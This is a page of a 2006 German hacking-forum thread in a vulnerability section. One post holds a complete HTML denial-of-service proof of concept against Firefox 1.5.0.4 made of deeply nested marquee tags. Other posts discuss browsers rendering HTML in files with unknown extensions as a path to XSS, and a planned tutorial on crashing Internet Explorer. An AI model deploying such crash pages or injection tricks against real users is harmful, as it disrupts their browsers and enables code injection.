Verfasst am: 10.03.2006 21:10 |
|
|
BlackLotus |
|
 |
 |
Anmeldedatum: 04.01.2006 |
Beiträge: 717 |
Wohnort: www and 127.0.0.1/localhost |
|
|
 |
 |
 |
|
Jo ich probier es grade hinzubekommen das endlich der mediawiki geht ><
Ich schaff das schon da ich aber krank bin geht alles etwas langsamer |
|
_________________ Eine Kette ist nur so stark wie ihr schwächstes Glied.
Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein
Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das
http://blackwiki.bl.ohost.de |
|
|
|
 | |  |
Verfasst am: 25.06.2006 19:22 |
|
|
Rebellion |
|
 |
 |
Anmeldedatum: 04.01.2006 |
Beiträge: 151 |
Wohnort: %systemroot% |
|
|
 |
 |
 |
|
Mozilla Firefox <= 1.5.0.4 Denial of Service Exploit:
Code: | <html>
<head>
<title>Mozilla Firefox <= 1.5.0.4 Denial of Service Exploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html> |
|
|
|
|
|
 | |  |
Verfasst am: 25.06.2006 19:51 |
|
|
duddits |
|
 |
 |
Anmeldedatum: 03.01.2006 |
Beiträge: 569 |
Wohnort: /proc |
|
|
 |
 |
 |
|
Hi,
ja interessanter Exploit habe ihn auch gerade unter Milw0rm gesehen.
Dabei fällt mir zu der unbekannten Endung von Html Dokumenten noch was ein.
Egal ob Firefox, Internet Explorer oder Opera, bei all diesen Browsern ist es so, das wenn man eine unbekannte Datei-Endung
benutzt und in der Datei Html-Tags enthalten sind, das diese vom jeweiligen Browser interpretiert wird.
http://ia41.ia.ohost.de/proof.alalaba
mfg duddits |
|
|
|
|
 | |  |
Verfasst am: 25.06.2006 20:36 |
|
|
4lx |
|
|
 |
Anmeldedatum: 02.01.2006 |
Beiträge: 369 |
Wohnort: /offtopic |
|
|
 |
 |
 |
|
@duddits:
Das stimmt, aber wobei liegt denn da das Schadpotential?
Ich sehe diese Funktion eher als eine Konvention an, um eine Art Standard herzustellen. Was sollte denn sonst bei einer Datei mit unbekannter Endung hinter dem Punkt passieren? Ausserdem sollte man mit HTML nicht so viel anrichten können, ausser dem da oben natürlich.^^ |
|
_________________ "Das Staunen ist Anfang der Erkenntnis." -Platon
"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof |
|
|
|
 | |  |
Verfasst am: 25.06.2006 21:55 |
|
|
BlackLotus |
|
 |
 |
Anmeldedatum: 04.01.2006 |
Beiträge: 717 |
Wohnort: www and 127.0.0.1/localhost |
|
|
 |
 |
 |
|
Das ist dazu da um fremden code ausführen
Gut für XSS oder ähnliches.
Das hatte ich aber schonmal alles aufgeschrieben imho
Aber bei endungen die schon vergeben sind gehts nur bei'm IExploder |
|
_________________ Eine Kette ist nur so stark wie ihr schwächstes Glied.
Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein
Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das
http://blackwiki.bl.ohost.de |
|
|
|
Verfasst am: 04.07.2006 17:15 |
|
|
BadLord |
|
|
 |
Anmeldedatum: 19.05.2006 |
Beiträge: 11 |
|
|
|
 |
 |
 |
|
Naja, schade ich habe mir gedacht ich schreib mal ein Tutorial dort behandle ich ein paar Ideen den IE abkacken zu lassen aber einige sind hier eben schon genannt.
Hätte noch wer Interesse an dem ejtzt schon fertigen tut?
lg  |
|
|
|
|
Verfasst am: 04.07.2006 17:19 |
|
|
Phara0h |
|
 |
 |
Anmeldedatum: 31.12.2005 |
Beiträge: 357 |
Wohnort: /dev/RL |
|
|
 |
 |
 |
|
Wenns so wie so fertig is kannste das auch posten  |
|
_________________
 |
|
|
|
Verfasst am: 04.07.2006 17:20 |
|
|
duddits |
|
 |
 |
Anmeldedatum: 03.01.2006 |
Beiträge: 569 |
Wohnort: /proc |
|
|
 |
 |
 |
|
Hi,
gerne immer doch. Tutorials sind hier immer herzlichst willkommen auch
wenn Teile davon schon in anderen Threads behandelt wurden.
mfg duddits |
|
|
|
|
Verfasst am: 04.07.2006 17:38 |
|
|
BadLord |
|
|
 |
Anmeldedatum: 19.05.2006 |
Beiträge: 11 |
|
|
|
 |
 |
 |
|
|
|
|
|
Verfasst am: 04.07.2006 20:43 |
|
|
Cerox |
|
 |
 |
Anmeldedatum: 31.12.2005 |
Beiträge: 782 |
Wohnort: Engelskirchen |
|
|
 |
 |
 |
|
Hi,
der IE7 ist doch etwas sicherer geworden.
Der IE nervt nämlich dann mit seinem Phishing und Active-X Filter und selbst wenn ich das ignoriere, zeigt er unten links an, dass das Bild Fehler enthält. |
|
|
|
|
Foren-Übersicht » Sicherheitslücken |
Du kannst keine Beiträge in dieses Forum schreiben. Du kannst auf Beiträge in diesem Forum nicht antworten. Du kannst deine Beiträge in diesem Forum nicht bearbeiten. Du kannst deine Beiträge in diesem Forum nicht löschen. Du kannst an Umfragen in diesem Forum nicht mitmachen.
|
Alle Zeiten sind GMT + 1 Stunde
Seite 2 von 2
Gehe zu Seite Zurück 1, 2
|
|
|
|